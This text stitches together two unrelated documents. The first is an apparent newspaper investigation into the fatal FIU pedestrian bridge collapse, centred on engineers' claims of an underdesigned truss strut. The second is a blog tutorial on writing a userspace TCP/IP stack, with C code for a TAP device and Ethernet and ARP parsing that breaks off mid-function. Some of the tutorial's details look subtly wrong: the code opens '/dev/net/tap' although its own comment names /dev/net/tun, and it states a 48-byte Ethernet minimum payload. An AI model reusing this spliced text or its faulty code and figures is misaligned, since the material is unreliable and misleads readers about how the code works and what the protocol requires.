FIU had grand plans for 'signature' bridge. But the design had a key mistake

It started as an idea for a footbridge to get college students safely over the busy Tamiami Trail.

But fueled by millions of dollars in available federal stimulus grants, Florida International University's doomed pedestrian bridge morphed into something far more ambitious: A gleaming testament to FIU's lofty institutional aspirations and the linchpin in a grand plan to create a true college town in the neighboring working-class suburb of Sweetwater.

As FIU's ambitions grew, the need to shape a uniquely memorable bridge drove key engineering decisions, resulting in a striking but unorthodox concrete structure. But the design hid a fatal flaw that its designers and reviewers failed to recognize, according to experts who have examined plans and mathematical calculations for the project.

The unconventional placement of diagonal supports in an uneven zig-zag pattern along the bridge produced a complex structural web with a glaring weakness at a key connection point, apparently overlooked by designers at FIGG Bridge Group, say three independent structural engineers who reviewed nearly 2,000 pages of calculations for the bridge at the Miami Herald's request.

The weakness was likely a key factor in its fatal March 15 collapse, the independent engineers told the Herald.

The engineers believe FIGG significantly misjudged what would happen when a large amount of structural stress was placed on a single diagonal strut — a concrete brace that helped support the bridge — at the north end of the 174-foot span. That resulted in an undernourished strut and anchor that could not adequately bear the weight of the bridge and the substantial forces placed on them when the span was lifted into place over two support piers, the outside experts said. That joint is precisely where the bridge appears to have failed — and where potentially worrisome cracks began to appear even before the bridge was installed over the eight-lane road on March 10.

As a consequence of the apparent design error, the diagonal support at the span's north end was so overloaded that additional stress put on it by construction crews tightening internal support rods on March 15 likely caused it to separate from the walkway deck, instantly sending the entire 950-ton span crashing to the roadway in a chain reaction of structural failure, the engineers said. The accident killed one construction worker and five people sitting in cars at a stoplight below.

"The tensioning work could have pushed it over the edge," said Linwood Howell, an Austin-based engineer who is contracted to inspect bridges for the state of Texas.

This blue hydraulic jack was attached to a tensioning rod running through the bridge’s No. 11 strut — a concrete brace that helped support the span — in order to re-tension the structure. It’s not clear why workers were doing this, but independent engineers believe the procedure caused the No. 11 support to fail.

FIU and FIGG, which say they have been told by federal authorities not to discuss the collapse of the bridge in detail for the time being, said the National Transportation Safety Board's investigation must run its course before conclusions can be drawn. The engineers consulted by the Herald cautioned that the apparent design error may not be the sole cause of the collapse.

The span was an unusual re-interpretation of a traditional truss bridge, which is supported in part by a series of interconnected upright triangles. But FIU's bridge was designed to mimic the dramatic look of a cable-stayed bridge, where the deck is suspended from cables fanning out from a tall mast. In FIGG's design, though, the "cables" — actually metal pipes — were mostly just for show. The diagonal, v-shaped struts of the truss did the structural work.

To carry through the cable-stayed look, the struts had to line up with the pipes from the mast, resulting in a highly irregular arrangement that the experts say may have made the critical defect harder to detect than it might have been in a conventional truss design.

The FIU bridge was meant to mimic the look of a cable-stayed bridge. But the 'cables' were actually steel pipes that didn't play a structural role. And in order to pull off the aesthetic, the bridge's designers had to make the diagonal supports beneath them a variety of different shapes and sizes. That complication may have led the designers to miss a crucial error, independent engineers who've examined the bridge's plans believe: One of the supports was not strong enough.

David Beck

"It made the trusses more complicated," said David Beck, a New Hampshire engineer who helped the Boston Globe uncover mistakes in Boston's $10.8 billion Big Dig project. "If you were not trying to go ahead and conform to the aesthetics of the 10 cables ... the geometry on the trusses would have been more structurally efficient."

Crucially, had the strut and its connection to the walkway deck been stouter, the engineers say, the unusual bridge likely would have held up just fine. But FIGG's engineers appear not to have sufficiently considered potential vulnerabilities in their novel design, the experts concluded.

The Herald obtained the structural calculations and design plans through a public records request and shared them with the engineers. Howell and Beck, who both have expertise in bridge design and structural engineering, analyzed the plans and calculations independently but came to similar conclusions.

A third structural engineer with similar qualifications, Ralph Verrastro, closely examined the bridge plans but did not review the calculations and said he thus can't say whether there was a design weakness in the bridge. But he said the bridge design led to atypical details and unusual complications in the bridge move that could have played into the collapse.

"They were out on an edge," Verrastro said.

A fourth engineer, also a bridge expert who examined the FIGG calculations in detail, arrived at conclusions similar to those of Beck and Howell. The engineer asked not to be named.

The Herald did not compensate any of the engineers for their time or work, but flew Beck to Miami for a day to consult with reporters.

Workers stood on top of the bridge where they attached a hydraulic jack to tensioning rods. The rods were accessed through the protruding structures above the juncture of each support strut and the bridge’s canopy.

Kevin Scott Miami Herald staff

Only the NTSB can give an official account of why the bridge fell. But the federal agency's inquiry could take between one and two years from the date of the accident. Any conclusions drawn before then by outside experts do not serve the public's interest, the NTSB says.

"There is one agency tasked with conducting a comprehensive, independent and objective investigation into this bridge collapse and that’s the NTSB," Chris O'Neil, the agency's spokesman, said in an interview. "As qualified as other experts may be, if they are drawing conclusions about this accident, it is speculation at best. Unless you’re part of the investigative team, you may not be privy to all the information."

That information is no longer accessible to the public, however. The NTSB has severely restricted access to records related to the accident, leading the Miami Herald to file a lawsuit demanding access to documents that were previously available for public review under Florida public records laws.

All the engineers consulted by the Herald said their initial findings could change with further information gathered by the NTSB.

Even so — given the available evidence — the design for the bridge does not appear "structurally logical," Beck said.

While the singular design was unorthodox, it did fulfill FIU's aesthetic vision.

When two competing teams presented their plans for the bridge in 2015, only one struck Tom Gustafson, an FIU administrator and former speaker of the Florida House, as matching the grandeur sought by the university.

The proposal, by Munilla Construction Management, a politically connected South Florida construction company that has won local, state and federal contracts, and FIGG, a renowned bridge-design firm from Tallahassee, called for a sturdy concrete structure bedecked with a pylon tower for 10 imitation cables that could be dramatically lit at night. It also included amenities such as WiFi, planters, benches — even vendors selling FIU gear.

The rival plan, said Gustafson, a member of the selection committee, was simply conventional and banal.

"[The other design] is not a place I’m going to want to be. It’s not a place," Gustafson said, according to an audio recording of the meeting. "It’s a 12-foot-wide sidewalk across a busy highway and I don’t think that’s what we wanted."

He did not respond to a request for comment.

A simpler bridge — like the $6 million steel walkway constructed over South Dixie Highway by the University of Miami last year — would have been easier to design and build. The FIU bridge, made of more visually pleasing and longer-lasting concrete, cost $14.3 million and weighed nearly 10 times as much as UM's. FIU's consulting planners had at first envisioned something more similar to the UM project.

The University of Miami built a pedestrian bridge across South Dixie Highway that was far simpler than the doomed FIU project.

CARL JUSTE cjuste@miamiherald.com

Kenneth Jessell, chief financial officer for FIU, disputed the suggestion that the bridge's complexity played a role in its failure.

"Simplicity in design is not synonymous with safety, just as innovative design cannot be equated with lack of safety," he said in a statement.

Ron Sachs, a spokesman for FIGG, provided the following statement: "It is a breach of widely held professional standards of ethics for any engineer to judge or speculate on any aspect of a construction accident unless they have complete knowledge of all the facts, which include construction, materials, design, and other factors, and are highly experienced in bridge design."

Arthur Schwartz, deputy director and general counsel for the National Society of Professional Engineers, said independent engineers often use their expertise to shed light on tragedies such as Hurricane Harvey and the I-35 bridge collapse in Minnesota.

"I’m not aware of anything in our [ethics] code that says it’s unethical to render an opinion," as long as the engineer has studied the facts and circumstances of the incident and is properly trained, Schwartz said.

MCM, which built the bridge, said it could not respond because of the NTSB prohibition on doing so.

Survivors of the collapse and families of the dead have filed lawsuits alleging wrongful death and negligence. Their attorneys have also criticized the NTSB for denying them access to documents.

Bridge beginnings

The FIU project had its genesis in a simple need to provide a safe way for students and others to get across the Tamiami Trail from the school's main campus north to Sweetwater's compact main street, Southwest 109th Avenue.

Founded as a commuter school on a former airfield, FIU embarked on a massive building spree in the 1980s as it sought to become a top public university. It added medical and law schools and a football stadium and expanded science and engineering programs until its main campus was bursting at the seams, plagued by traffic logjams and a parking shortage. One solution administrators settled on: Get more students to live on campus or within walking distance.

So the university embraced an increasingly common alternative to dorms, recruiting private developers to build high-rise student housing across the Trail and a narrow canal in Sweetwater, a mostly immigrant city in need of an economic boost. FIU's plan soon expanded in scope to include improvements to Sweetwater's main drag, so its modest downtown could serve as a gathering place for college students. A broad new plaza at the center of campus would connect to Sweetwater through a new pedestrian and bike pathway and a bridge.

Sweetwater was hoping that the bridge over Tamiami Trail and the adjacent canal would help give Southwest 109th Avenue, shown here, the feel of a college town.

Sam Navarro snavarro@MiamiHerald.com

The so-called "FIU University-City Prosperity Project" eventually ballooned into a $120 million vision that encompassed far more than just town-and-gown improvements, extending to campus trolleys and a transit station for Miami-Dade County's planned rapid-bus system in a new FIU parking garage alongside the Trail.

To help finance the Trail bridge and the campus and Sweetwater pedestrian projects, FIU turned to TIGER grants, which funded shovel-ready transportation plans as part of the Obama administration's stimulus package to help the country recover from the economic crash. FIU was awarded $21 million in federal funds for the overall project.

Because the bridge was the most visible piece of the University City grand plan, FIU did not seek an ordinary span, but felt it needed some design razzle-dazzle, university documents and brochures show.

Initially, FIU sought a cable-stayed bridge — that is, a bridge supported by cables hung from a tall pylon — and drew up renderings, according to its TIGER grant applications and other documents.

FIU had originally envisioned a more traditional design for its 'signature' pedestrian bridge, including this cable-stayed approach from an early conceptualization. But the construction of such a bridge would have blocked traffic down the busy Tamiami Trail far longer than the design ultimately chosen.

But FIU and its planning consultants, T.Y. Lin International, a global design and engineering firm, then settled on a different alternative: a time-tested truss structure, a common design consisting of a deck with open, V-shaped vertical supports on each side tied together at the top in a structural web.

Such structures are generally sturdy and reliable because they're "redundant" — meaning that failure of a single strut on one side would not bring down the entire bridge because the corresponding piece on the opposite side would still provide support. In creative designers' hands, truss bridges can also lend themselves to some flashy variations.

The Tokyo Gate Bridge in Japan is a dramatic 'truss' bridge that spans roughly 1.6 miles. The vertical supports on both edges of the bridge help hold it up.

Something else was also likely driving FIU's change of heart about the type of bridge it wanted: traffic.

As the bridge plan was being formalized, FIU had also begun promoting the use of an increasingly popular approach to bridge construction. In so-called Accelerated Bridge Construction, or ABC, bridge spans are prefabricated, then moved and hoisted into place in a matter of hours to avoid the long road closures so dreaded by motorists, highway authorities and elected officials.

FIU had launched and heavily promoted a center for ABC at its engineering school, and explicitly saw use of the technique for its pedestrian bridge as a demonstration of its efficiency.

Such quick-bridge construction effectively ruled out a true cable-stayed bridge. Cable-supported bridges are built in sections and in place, which requires extended road closures. Truss designs, in contrast, are ideal for the accelerated approach, engineers say.

Bid documents drawn up for the project by T.Y. Lin made it abundantly clear that FIU wanted no ordinary truss bridge. The document outlined a broad scope for the design of the pedestrian bridge, which would serve as a "landmark" for the school and a "gateway" for west Miami-Dade County.

"This structure should function as more than just a path for circulation; it should be a place to be and a place to be experienced, and the FIU campus and its students must be proud of it," the document's introduction reads. "It should be a destination in its own right where community members might linger, gather, and create an urban social space — a linear park."

Bid specifications emphasized the message that a conventional approach would not win the contract: "The selection criteria will be weighed heavily towards an innovative design that represents the intentions of this project, creating a distinctive landmark for the region."

The uneven spacing of diagonal struts — braces that helped support the FIU bridge — was meant to line up with pipes that were to be added above.

The specs called for a broad walkway at least 20 feet wide, but preferably 30 feet, and explicitly invited inventive "hybrid" variations on the truss design. But it also sought to establish some constraints.

The consultants sought a "primarily" steel structure with a concrete walkway. They also directly discouraged use of "non-redundant, fracture critical" designs — meaning designs in which failure of one structural element could lead to a catastrophic collapse. But they left the door open to other designs, saying those would be subject to approval by FIU.

What FIU got in the winning proposal by contractor MCM and FIGG was indeed unconventional. The MCM team easily outscored the other finalist, Facchina, with a design that offered everything FIU wanted, including fast-bridge construction and a structure that looked like — but was not in reality — a cable-stayed bridge.

MCM and FIGG proposed a highly unusual, hybrid version of a truss design. Instead of two sets of parallel, regularly spaced vertical truss pieces running along both edges of the bridge as in a straightforward truss, the bridge would have a single set of irregularly shaped struts running down the center of the bridge, tying together the deck and a shading canopy.

A standard truss bridge features two rows of supports. That way, if one side fails, the entire bridge may not collapse.

That approach had the advantage of giving the bridge an expansive, open look and feel. It would be built entirely of reinforced concrete, for a cleaner appearance and greater durability and ease of maintenance than plain steel.

But the design also appears to contravene T.Y. Lin's recommendations.

The bridge FIU ended up with was steel-reinforced concrete, and not primarily steel. Concrete can be harder to work with and more unforgiving, as well as substantially heavier than steel. The independent engineers and other outside experts say concrete truss bridges are exceedingly rare, and they can find no other design similar to the FIU bridge anywhere.

The single row of support struts, meanwhile, is precisely the kind of "non-redundant" design T.Y. Lin's specs sought to avoid. On the FIU bridge, the failure of a single strut could — and in fact, did — cause the entire span to fall because there was no backup support for it, the outside engineers say.

"It's only as strong as its weakest link," said Howell, the Texas-based bridge engineering expert who reviewed FIGG's calculations for the Herald.

Making things even more complicated was a decision to mimic the look, but not the function, of a cable-stayed bridge, Beck and Howell said. FIGG, which has said publicly the bridge is a truss design and not cable stayed, added a central pylon with mostly decorative steel pipes, instead of cables, connected to the bridge's canopy. FIGG said the pipes would help dampen vibrations from wind and people walking across.

That decision, the engineers said, determined the irregular size, spacing and angling of the diagonal truss support pieces, which had to line up with the pipes to complete the illusion of a cable-stayed bridge and give the span a dramatic profile visible from a distance, especially when lit up at night. The pylon was designed to be 109 feet tall to mark the location at 109th Avenue, a height that helped set the angles of the pipes and trusses, Beck said.

"The whole design is driven by the aesthetics," Howell said. "Bottom line is, FIGG is trying to be innovative to get the job. That's what they had to do. That's how they won the proposal."

Traditional truss bridges tend to have supports of equal size and geometry.

The engineers stress it's not uncommon for projects to put engineering at the service of aesthetics. But that means designers and engineers must then take extra care to make sure they understand the structure's function and look for potential flaws.

In the case of the FIU bridge, though, back-checking their conclusions appears to be where the school's contractors ran into trouble, the engineers say.

The faux cable-stayed bridge design created a highly irregular pattern for the diagonal struts. The irregular pattern, in turn, complicated the calculations for determining the stresses at different points and resulted in each of the 12 pieces being of different length and thickness, the three engineers who undertook a review of FIGG's calculations say.

The designers utilized two commonly used computer models to analyze stresses on their bridge design to determine the strength required for each structural piece. Beck and Howell, who say they did their own simpler calculations to back-check the numbers used by FIGG, concluded the figures in the firm's calculations significantly under-represent the forces working on the No. 11 truss piece, the last diagonal strut on the bridge's north end.

The ungainly spacing between the support structures of the FIU bridge was an aesthetic choice meant to line them up with the steel pipes above that gave the impression of a cable-stayed bridge. Too much stress was placed on the junction between the No. 11 beam, the deck and the No. 12 beam, according to independent engineers consulted by the Miami Herald.

FIGG design plans

The fourth engineer, who has asked not to be named, agreed that the point where the No. 11 strut met the deck was too weak to hold up once the span was installed over the roadway.

That's critical, Beck and Howell said, because the No. 11 strut bore the greatest stress of any of the diagonal pieces in the design in comparison to its strength.

"That configuration put heavy stress on one member, but for whatever reason, [the designers] did not realize it was underdesigned for the stress," Beck said.

"It's sitting there stressed to the limit," Howell said.

That resulted in a support piece that was likely not thick enough, and even more significantly, lacked sufficient steel rebar reinforcements at the point where it connected to the deck, all three engineers who reviewed the calculations said. That meant it could not adequately withstand the load of the bridge weight it was meant to carry, nor resist "shearing" stress at the connection to the deck that tended to pull the base of the diagonal strut from its anchor, they said.

By comparison, the diagonal piece at the opposite end of the span, No. 2, was a foot thicker and carried less structural stress, Beck and Howell pointed out.

Because the calculations don't fully show how FIGG derived its numbers, Beck and Howell said it's hard to say how the mistake may have been made. But they suggested that over-reliance on the computer models, a common pitfall in the profession, may have played into it.

It's difficult to tell who was responsible for the bridge designs and any possible errors, the three engineers who examined the calculations said. The plans are stamped by FIGG's chief engineer, W. Denney Pate, a lauded designer of bridges around the country and the engineer of record for the bridge.

But those three independent engineers say it's unclear how involved Pate was in design or oversight of the FIU bridge. Notes in the plans bear the notation "M.F.," the initials of a senior bridge engineer at FIGG. The engineers consulted by the Herald say FIGG would probably also have had a team of junior engineers working on it.

It's also unknown how thorough a check was conducted by Louis Berger, a large engineering firm hired to review the design. Both FIU and FDOT, in response to a public records request from the Herald, say they can't find relevant documents from Berger, other than a brief letter certifying the design plans. They were unable to locate even the contract laying out how much Berger was paid. The contract would probably also specify how thorough Berger's review of the design should be and how many hours its engineers should spend on the task.

"Louis Berger continues to review this matter and, at this time, cannot provide additional information as it is part of a government investigation and litigation," a spokeswoman for the firm said in an email.

Such peer reviews can be superficial. But the three outside engineers who studied the plan in detail said someone should have caught an error that Beck and Howell characterized as clear. FDOT and U.S. Department of Transportation engineers also reviewed the plans, emails released in response to a request by the Herald show.

"I would not accept these calculations. It really comes down to some kind of design error in this page," Howell said, referring to a place in the calculations focusing on the area of the No. 11 strut. "There is no way this connection is OK. I'm thinking this was not really checked. You want to do simple checks on your sophisticated program to make sure it's reasonable."

What appears certain, the three engineers who reviewed the calculations say, is that more concrete and more rebar pieces at the deck connection, and perhaps a thicker depth on the No. 11 truss piece, would have prevented catastrophe.

"They could properly design that pattern," Howell said, referring to the irregular structural design of the bridge. "There is nothing particularly difficult about it."

"If they had made member 11 three feet deep instead of two feet deep, we wouldn't be sitting here today," said Beck, as he conducted a review of the plans and calculations for reporters. "It wouldn't have failed, based on what I have seen so far."

All four engineers say other factors could have played a role in the bridge's failure, including last-minute design changes or defects in materials and workmanship.

The bridge was made of a novel titanium dioxide concrete mix, designed to be self-cleaning. Beck said the concrete at the point where the bridge failed shattered into unusually small pieces, suggesting it was highly brittle, though he can't say whether that had anything to do with the collapse. Research into so-called TiO2 concrete shows that if too much titanium dioxide is added to the mix, the concrete loses strength. FIU said its bridge was the first in the world made entirely of a TiO2 mix.

Other decisions by FIGG and MCM may have played into the collapse, the three engineers who looked at the calculations said. The installed span was only the main portion of the bridge, which would not have opened until next year. A shorter span connecting the north end across the canal to Sweetwater was to be built in place once the main span was up.

Because the back span would be structurally tied into the main span, the bridge would have been significantly stronger had the shorter portion been in place, they said. That could have ameliorated or even prevented the failure of the No. 11 piece, they say.

What the engineers say they still don't know is precisely how the No. 11 strut failed. That determination may have to await a report by the NTSB. The agency has barred the release of public records related to the bridge dated after Feb. 19.

The secrecy has precluded public scrutiny of some critical decisions by FIU's project team, including how they decided to handle cracks that had appeared on the bridge's north end before it collapsed, or what they thought had caused the cracking.

The cracks at the base of the No. 11 piece, which have drawn substantial public attention, could have been a sign that something within the structure was amiss — another critical element that the bridge designers and engineers on FIU's contracting team may have failed to fully account for, the three independent engineers who looked at the calculations say.

Cracks in concrete are common and often minor. But given the unconventional design of FIU's bridge, that should at the very least have prompted work to stop and an in-depth diagnosis to be conducted, including a fresh look at the structural calculations that should have uncovered any hidden deficiencies, those engineers said.

Cracks that developed in the support strut that later failed when the Florida International University bridge collapsed should have alerted the span's engineers that their design might have problems, outside experts told the Herald.

Florida International University

But records released by the Florida Department of Transportation before the NTSB issued its ban suggest FIGG engineers saw little reason to undertake a full reassessment, something that would have taken days if not weeks, the independent engineers note. FIGG's principal engineer, Pate, left a voicemail message for an FDOT official two days before the collapse to report that cracking had appeared, but added it did not appear to pose a safety hazard.

If the FIU team relied just on Pate's word, and not a thorough analysis, that was a serious error, Howell said.

"You don't accept a verbal reassurance," he said. "You want a report."

The three engineers who examined the plan calculations — as well as Verrastro, an ABC expert — conjecture that the move of the main span into position over the Trail may have been a contributing factor in the collapse. Because the bridge was lifted into place by two special transporters set toward the center, the ends of the span — designed to rest on pylons — would tend to sag under their own weight while being moved, the engineers say.

To counteract that sag, engineers added steel support rods into the two end diagonal pieces, No. 2 and No. 11. Documents show that, as planned, those rods were tensioned before the move to provide added support to the bridge ends while up in the air. They were then de-tensioned once the span was resting on the pylons, because the added support was not needed at that point.

Beck and Howell said they believe the underdesigned No. 11 node was possibly damaged by twisting and bending forces during the move, making it even more vulnerable to failure. Engineering plans for the move assumed that stresses on No. 11 had been properly calculated, and sensors placed along the span during the move would have warned FIU's team if those exceeded expected parameters.

Thus, the method of accelerated bridge construction, initially scrutinized as a possible contributor, was by itself likely not a probable cause of the accident, the engineers concur.

"The problem was not ABC, it was the execution," Beck said.

The NTSB recently confirmed for the first time that workers were tightening the No. 2 and No. 11 support rods when the bridge fell. The agency's brief report did not say why they were doing so. But the outside engineers say it may have been an attempt to close up cracks at the No. 11 connecting point.

The fact that workers were atop the bridge canopy in a possible effort to repair a defect while traffic continued to flow below strongly suggests that FIGG engineers remained unaware of the critical structural flaw at the No. 11 support, the engineers said.

At least one said that if so, it constitutes an avoidable mistake on a bridge that should never have been so complicated.

“This is not a big project," Beck said. "It’s a darn pedestrian bridge.”

The experts

David Beck

Global Engineering Advisors

David Beck is a New Hampshire-based structural engineer and construction manager with more than 40 years of national and international experience. He has planned, designed and managed major civil construction projects including bridges, power plants, offshore oil platforms, wastewater treatment facilities, oceanic outfalls, water and rail tunnels, and large urban traffic projects.


Linwood Howell

XR Structural

Linwood Howell is a senior engineer specializing in bridge engineering at XR Structural in Austin, Texas. The firm has been approved by the Texas Department of Transportation to inspect bridges in the state for over 30 years. Howell has inspected more than 20,000 bridges, designed more than 30 and has provided engineering services for bridge construction to dozens of contractors. Howell has expertise with truss bridges, having inspected and performed load ratings on nearly all the approximately 100 truss bridges on public roads in Texas.


Ralph Verrastro

Bridging Solutions

Ralph Verrastro graduated with a BS in civil engineering from Cornell University in 1976. His career includes bridge design experience throughout the United States and he is a registered professional engineer in 37 states. Verrastro specializes in the design, inspection, evaluation, technical supervision, and quality assurance/quality control for new and rehabilitation bridge projects. He is a technical expert in the use of fast track repair/replacement methods using prefabricated bridge components also known as Accelerated Bridge Construction. He has extensive experience in the evaluation and repair of historic metal truss bridges and concrete arch bridges. He has served as the specialty structural engineer for over 500 bridge structures throughout the United States. In 2018, he was named "Engineer of the Year" by the Florida Engineering Society.

A fourth engineer who reviewed plans and calculations asked not to be named.


Let's code a TCP/IP stack, 1: Ethernet & ARP (2016)


Writing your own TCP/IP stack may seem like a daunting task. Indeed, TCP has accumulated many specifications over its lifetime of more than thirty years. The core specification, however, is seemingly compact - the important parts being TCP header parsing, the state machine, congestion control and retransmission timeout computation.

The most common layer 2 and layer 3 protocols, Ethernet and IP respectively, pale in comparison to TCP’s complexity. In this blog series, we will implement a minimal userspace TCP/IP stack for Linux.

The purpose of these posts and the resulting software is purely educational - to learn network and system programming at a deeper level.

To intercept low-level network traffic from the Linux kernel, we will use a Linux TAP device. In short, a TUN/TAP device is often used by networking userspace applications to manipulate L3/L2 traffic, respectively. A popular example is tunneling, where a packet is wrapped inside the payload of another packet.

The advantage of TUN/TAP devices is that they’re easy to set up in a userspace program and they are already being used in a multitude of programs, such as OpenVPN.

As we want to build the networking stack from the layer 2 up, we need a TAP device. We instantiate it like so:

/*
 * Taken from Kernel Documentation/networking/tuntap.txt
 * (print_error() and CLEAR() are helper macros from the project's own
 * sources; the kernel document itself opens /dev/net/tun)
 */
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <linux/if.h>
#include <linux/if_tun.h>

int tun_alloc(char *dev)
{
    struct ifreq ifr;
    int fd, err;

    if ((fd = open("/dev/net/tap", O_RDWR)) < 0) {
        print_error("Cannot open TUN/TAP dev");
        exit(1);
    }

    CLEAR(ifr);

    /* Flags: IFF_TUN   - TUN device (no Ethernet headers)
     *        IFF_TAP   - TAP device
     *
     *        IFF_NO_PI - Do not provide packet information
     */
    ifr.ifr_flags = IFF_TAP | IFF_NO_PI;
    if (*dev) {
        strncpy(ifr.ifr_name, dev, IFNAMSIZ);
    }

    if ((err = ioctl(fd, TUNSETIFF, (void *) &ifr)) < 0) {
        print_error("ERR: Could not ioctl tun: %s\n", strerror(errno));
        close(fd);
        return err;
    }

    strcpy(dev, ifr.ifr_name);
    return fd;
}

After this, the returned file descriptor fd can be used to read and write data to the virtual device’s Ethernet buffer.

The flag IFF_NO_PI is crucial here, otherwise we end up with unnecessary packet information prepended to the Ethernet frame. You can actually take a look at the kernel’s source code of the tun-device driver and verify this yourself.

The multitude of different Ethernet networking technologies is the backbone of connecting computers in Local Area Networks (LANs). As with all physical technology, the Ethernet standard has greatly evolved from its first version, published by Digital Equipment Corporation, Intel and Xerox in 1980.

The first version of Ethernet was slow by today’s standards - about 10Mb/s - and it used half-duplex communication, meaning that you either sent or received data, but not both at the same time. This is why a Media Access Control (MAC) protocol had to be incorporated to organize the data flow. Even to this day, Carrier Sense, Multiple Access with Collision Detection (CSMA/CD) is required as the MAC method when running an Ethernet interface in half-duplex mode.

The 100BASE-T Ethernet standard introduced twisted-pair wiring, which enabled full-duplex communication and higher throughput. Additionally, the simultaneous rise in popularity of Ethernet switches made CSMA/CD largely obsolete.

The different Ethernet standards are maintained by the IEEE 802.3 working group.

Next, we’ll take a look at the Ethernet frame header. It can be declared as a C struct as follows:

#include <linux/if_ether.h>

struct eth_hdr
{
    unsigned char dmac[6];
    unsigned char smac[6];
    uint16_t ethertype;
    unsigned char payload[];
} __attribute__((packed));

The dmac and smac are pretty self-explanatory fields. They contain the MAC addresses of the communicating parties (destination and source, respectively).

The overloaded field ethertype is a 2-octet field that, depending on its value, indicates either the length or the type of the payload. Specifically, if the field’s value is greater than or equal to 1536, the field contains the type of the payload (e.g. IPv4, ARP). If the value is less than that, it contains the length of the payload.

After the type field, there is a possibility of several different tags for the Ethernet frame. These tags can be used to describe the Virtual LAN (VLAN) or the Quality of Service (QoS) type of the frame. Ethernet frame tags are excluded from our implementation, so the corresponding field also does not show up in our protocol declaration.

The field payload contains a pointer to the Ethernet frame’s payload. In our case, this will contain an ARP or IPv4 packet. If the payload length is smaller than the minimum required 48 bytes (without tags), pad bytes are appended to the end of the payload to meet the requirement.

We also include the if_ether.h Linux header to provide a mapping between ethertypes and their hexadecimal values.

Lastly, the Ethernet frame format also includes the Frame Check Sequence field at the end, which is used with a Cyclic Redundancy Check (CRC) to check the integrity of the frame. We will omit the handling of this field in our implementation.

The attribute packed in a struct’s declaration is an implementation detail: it instructs the GNU C compiler not to optimize the struct memory layout for data alignment with padding bytes. The use of this attribute stems purely from the way we are “parsing” the protocol buffer, which is just a type cast over the data buffer with the proper protocol struct:

struct eth_hdr *hdr = (struct eth_hdr *) buf;

A portable, albeit slightly more laborious, approach would be to serialize the protocol data manually. This way, the compiler is free to add padding bytes to conform better to different processors’ data alignment requirements.

The overall scenario for parsing and handling incoming Ethernet frames is straightforward:

if (tun_read(buf, BUFLEN) < 0) {
    print_error("ERR: Read from tun_fd: %s\n", strerror(errno));
}

struct eth_hdr *hdr = init_eth_hdr(buf);

handle_frame(&netdev, hdr);

The handle_frame function just looks at the ethertype field of the Ethernet header, and decides its next action based upon the value.

The Address Resolution Protocol (ARP) is used for dynamically mapping a 48-bit Ethernet address (MAC address) to a protocol address (e.g. an IPv4 address). The key here is that with ARP, a multitude of different L3 protocols can be used: not just IPv4, but other protocols like CHAOS, which declares 16-bit protocol addresses.

The usual case is that you know the IP address of some service in your LAN, but to establish actual communication, the hardware address (MAC) also needs to be known. Hence, ARP is used to broadcast a query to the network, asking the owner of the IP address to report its hardware address.

The ARP packet format is relatively straightforward:

struct arp_hdr
{
    uint16_t hwtype;
    uint16_t protype;
    unsigned char hwsize;
    unsigned char prosize;
    uint16_t opcode;
    unsigned char data[];
} __attribute__((packed));

The ARP header (arp_hdr) contains the 2-octet hwtype, which determines the link layer type used. This is Ethernet in our case, and the actual value is 0x0001.

The 2-octet protype field indicates the protocol type. In our case, this is IPv4, which is communicated with the value 0x0800.

The hwsize and prosize fields are both 1-octet in size, and they contain the sizes of the hardware and protocol fields, respectively. In our case, these would be 6 bytes for MAC addresses, and 4 bytes for IP addresses.

The 2-octet field opcode declares the type of the ARP message. It can be ARP request (1), ARP reply (2), RARP request (3) or RARP reply (4).

The data field contains the actual payload of the ARP message, and in our case, this will contain IPv4 specific information:

struct arp_ipv4
{
    unsigned char smac[6];
    uint32_t sip;
    unsigned char dmac[6];
    uint32_t dip;
} __attribute__((packed));

The fields are pretty self-explanatory. smac and dmac contain the 6-byte MAC addresses of the sender and receiver, respectively. sip and dip contain the sender’s and receiver’s IP addresses, respectively.

The original specification depicts this simple algorithm for address resolution:

?Do I have the hardware type in ar$hrd?
Yes: (almost definitely)
  [optionally check the hardware length ar$hln]
  ?Do I speak the protocol in ar$pro?
  Yes:
    [optionally check the protocol length ar$pln]
    Merge_flag := false
    If the pair <protocol type, sender protocol address> is
        already in my translation table, update the sender
        hardware address field of the entry with the new
        information in the packet and set Merge_flag to true.
    ?Am I the target protocol address?
    Yes:
      If Merge_flag is false, add the triplet <protocol type,
          sender protocol address, sender hardware address> to
          the translation table.
      ?Is the opcode ares_op$REQUEST?  (NOW look at the opcode!!)
      Yes:
        Swap hardware and protocol fields, putting the local
            hardware and protocol addresses in the sender fields.
        Set the ar$op field to ares_op$REPLY
        Send the packet to the (new) target hardware address on
            the same hardware on which the request was received.

Namely, the translation table is used to store the results of ARP, so that hosts can just look up whether they already have the entry in their cache. This avoids spamming the network for redundant ARP requests.

The algorithm is implemented in arp.c.
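As an added example, not code from the lvl-ip project, here is the RFC 826 algorithm quoted above carried through in C: a constructed ARP request frame is type-cast with the post's eth_hdr, arp_hdr and arp_ipv4 layouts, the sender is merged into a small translation table, and a reply frame is built only when the request targets our address. The netdev struct, the table helpers and the length check (which pure cast-based parsing lacks) are this example's own.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <arpa/inet.h>                 /* htons/ntohs/htonl */

#define ETHERTYPE_ARP  0x0806          /* ethertype value for ARP */
#define ARP_HW_ETHER   0x0001          /* hwtype: Ethernet */
#define ARP_PRO_IPV4   0x0800          /* protype: IPv4 */
#define ARP_OP_REQUEST 1
#define ARP_OP_REPLY   2
#define ARP_TABLE_SIZE 16

/* Same packed layouts as in the post; the frame is parsed by type cast. */
struct eth_hdr  { unsigned char dmac[6], smac[6]; uint16_t ethertype;
                  unsigned char payload[]; } __attribute__((packed));
struct arp_hdr  { uint16_t hwtype, protype; unsigned char hwsize, prosize;
                  uint16_t opcode; unsigned char data[]; } __attribute__((packed));
struct arp_ipv4 { unsigned char smac[6]; uint32_t sip; unsigned char dmac[6];
                  uint32_t dip; } __attribute__((packed));

/* This example's own: the TAP device's identity (addr in network order). */
struct netdev { unsigned char hwaddr[6]; uint32_t addr; };

/* Translation table: RFC 826's <protocol type, protocol address, hardware
 * address> triplets, with the protocol type fixed to IPv4 here. */
struct arp_entry { int used; uint32_t ip; unsigned char mac[6]; };
static struct arp_entry arp_table[ARP_TABLE_SIZE];

/* Index of the entry for ip, else the lowest free slot (slot 0 if full). */
static int arp_slot(uint32_t ip)
{
    int free_slot = 0;
    for (int i = ARP_TABLE_SIZE - 1; i >= 0; i--) {
        if (arp_table[i].used && arp_table[i].ip == ip) return i;
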